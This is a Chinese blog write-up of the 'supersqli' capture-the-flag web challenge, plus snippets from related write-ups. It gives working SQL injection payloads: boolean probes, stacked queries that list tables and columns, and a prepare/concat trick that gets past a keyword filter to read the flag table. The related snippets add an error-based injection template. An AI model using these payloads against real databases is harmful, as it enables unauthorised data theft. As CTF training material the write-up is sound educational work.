攻防世界-Web-supersqli

最新推荐文章于 2024-08-03 23:12:25 发布
最新推荐文章于 2024-08-03 23:12:25 发布
阅读量331 收藏
点赞数 1
分类专栏: WriteUp 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39091609/article/details/108014037
版权

本题涉及到了堆叠注入、MySQL预编译

0x01

SQL注入的题目,按照流程来验证SQL注入漏洞。
首先输入1' and '1'='1发现正常输出,然后输入1' and '1'='2发现没有输出,进一步尝试联合注入,输入1' union select 1 #结果返回了

return preg_match("/select|update|delete|drop|insert|where|./i",$inject);

可见后端过滤掉了一些SQL关键字,显然不能直接通过这些关键字进行注入。

0x02

尝试使用堆叠注入,构造:1';show databases;#,执行成功了,返回如图:
在这里插入图片描述但是现在似乎不能验证当前数据库是哪个,不过也不影响我们通过show tables命令来列出当前数据库的表。(通过show tables from XX可以验证现在使用的是supersqli)

0x03

提交1';show tables;#,获取到所有表:
在这里插入图片描述里面有两个表:words和1919810931114514

0x04

提交1';show columns from words;#列出words表中的字段:
在这里插入图片描述提交1';show columns from `1919810931114514`;#注意反引号
在这里插入图片描述发现flag字段

0x05

接下来使用MySQL的预编译来执行对1919810931114514的查询,具体构造方法如下:
1';prepare pre from concat('s', 'elect * from `1919810931114514`');execute pre;#

在这里插入图片描述

uh3ng
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界-web-supersqli
wuh2333的博客
06-07 927
我们看到,服务端默认的查询语句查询出两个字段,说明查询的是words表,我们将表1919810931114514的名字改成words并且将flag字段改为id字段不就行了吗?这里尝试按照基本思路进行验证,先确定注入点,然后通过union查询依次确认数据库名,表名,字段名,最终获取到我们想要的字段信息。博客里提到的一种预编译绕过的方式可以让我们绕过waf的限制使用select语句,处理起来较为复杂,这里就不详细说明了。使用 or 永真修改查询条件可以将所有信息查询出来,因此这里肯定是存在sql注入的。
攻防世界 very_easy_sql
weixin_63640108的博客
06-12 1043
我理解的是相当于内网穿透,你获取到其中一个内网主机,可以用这个内网主机作为服务器向其他的内网机器发起攻击。报错注入模板 admin') and extractvalue(1, concat(0x7e, (select @@version),0x7e)) #4.攻击内外网的web应用,主要是使用get参数就可以实现的攻击(比如struts2,sqli等);报错的回显最大位数为32位,此时我们只获得了32位,需要用substr函数进行分割读取。分享,通过URL地址分享网页内容,通过URL获取目标页标签等内容。
攻防世界---web---supersqli
2201_75556700的博客
05-18 495
5、这里可以使用堆叠绕过(以分号来隔开每一次的sql语句的查询),查数据库名,再结合题目的提示可知,我们要找的信息在"supersqli"这个数据库中。6、查询"supersqli"数据库中的表名,使用下面的方法,查到了两张表。8、看到了flag字段,接着查询flag字段里面的信息。7、查询字段,由于表名是字符串,所以需要用``反引号。2、判断注入点,这里输入1'报错了,说明存在注入点。4、查看数据库名,这里发现select被过滤了。3、查看列数,根据结果显示可知,有2列。的表,并将其命名为 p。
攻防世界-web supersqli
m0_48108919的博客
02-10 469
根据题目这是一道sql注入题 输入1'测试,成功报错 可以看到这是一个MariaDB数据库,MariaDB是MySQL的一个分支,与mysql大部分的用法都是一样的,只有一些参数,特性的不同 1.使用order by来测试字段 1' order by n # 当order by 2显示正常,当order by 3报错,可以确定有两个字段 2.使用联合查询 1' union select 1,2 # 提示对select等操作词语进行了正则过滤,尝试使用双写、/**/绕过无效 ...
攻防世界-supersqli详解
Mr_helloword的博客
08-11 6355
supersqli 查看是否存在SQL注入 1' and 1=1 # 用二分法查看列数(有两列) 1' order by 2 # 使用联合查询发现做了SQL注入黑名单禁止出现以下关键字
攻防世界-web进阶-supersqli
weixin_47346400的博客
02-26 159
wp传送门
攻防世界WP-web-supersqli
wallacegen的博客
09-16 309
这是一道sql注入的题目。首先在输入框输入1和2,能够分别返回查询数据。可以看到url为http://220.249.52.133:31003/?inject=1,初步推断inject为注入点。 我们输入1',报错。 之前有考虑用sqlmap来做,但是没做出来= = ,网页源代码里面也有提示<!-- sqlmap是没有灵魂的 -->,但是从sqlmap的结果可以知道,使用的database为supersqli 尝试手工注入。 ...
攻防世界web--supersqli
m0_60715541的博客
10-27 315
一道攻防世界上面的sql注入
【愚公系列】2023年05月 攻防世界-Websupersqli)
热门推荐
时光隧道
01-24 3万+
SQL注入攻击是一种常见的网络攻击方式,攻击者通过在用户输入的数据中插入恶意代码,从而获取数据库中的敏感信息或者执行未授权的操作。为了防范SQL注入攻击,我们应该在应用程序中使用参数化查询这样的安全措施来防范这种攻击。同时,我们还应该加强数据过滤和输入验证,以确保用户输入的数据符合预期的格式和类型。
攻防世界-supersqli
m0_47571887的博客
11-01 101
根据题目提示,输入1‘没有回显,输入1’#正常回显 查字段,只有2个 select发现被过滤,尝试堆叠注入。 发现有两个表,分别查看 (查看字符串要加反引号) 1';show columns from `1919810931114514`--+ 1';show columns from `words`--+ 发现flag存放在1919810931114514里面 由于上面的探测得出搜索框里查询的是words表里的结果,so我们将表1919810931114514改为wo...
攻防世界Training-Stegano-1
10-31
【标题】"攻防世界Training-Stegano-1" 是一个关于信息安全领域的训练题目,主要涉及的是隐写术(Steganography)技术。隐写术是一种隐藏信息的技术,通常用于在图像、音频或文本中嵌入秘密数据,使得非授权者无法...
攻防世界nice-bgm杂项
11-20
在网络安全领域,"攻防世界"是一个广受欢迎的在线平台,提供各种安全挑战,帮助学习者提升他们的黑客防御和攻击技能。"nice-bgm杂项"是其中的一个挑战,属于"misc"类别,这意味着它可能涉及到多种不同类型的解题技巧...
攻防世界1-misc杂项
11-20
攻防世界1-misc杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947726
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界 supersqli writeup
12-14
发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能使用#,不知道为什么没有,最后发现是在查询...
赛蓝企业管理系统 AuthToken/Index 身份认证绕过漏洞复现
0xSec
08-03 206
赛蓝企业管理系统 AuthToken/Index 接口存在身份认证绕过漏洞,未授权的远程攻击者可以利用此接口构造token绕过身份认证,使用超级管理员账户登录系统后台,造成信息泄露或者恶意破坏,使系统处于极不安全的状态。
内网安全:多种横向移动方式
最新发布
8888的博客
08-03 570
DCOM:DCOM(分布式组件对象模型)是微软的一系列概念和程序接口。它支持不同的两台机器上的组件间的通信,不论它们是运行在局域网、广域网、还是Internet上。利用这个接口,客户端程序对象能够向网络中另一台计算机上的服务器程序对象发送请求,使用DCOM进行横向移动的优势之一在于,在远程主机上执行的进程将会是托管COM服务器端的软件获取DCOM列表:实验前提:1.关闭防火墙2.必须有管理员权限。
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1661
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
攻防世界-baby_web详解
12-21
根据提供的引用内容,攻防世界-baby_web是一个需要进行攻击和防御的网络应用。根据引用和引用[2]的描述,可以看出该应用存在注入漏洞,并且使用了一些安全措施来防止攻击者利用这些漏洞。攻击者可以通过注入恶意代码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值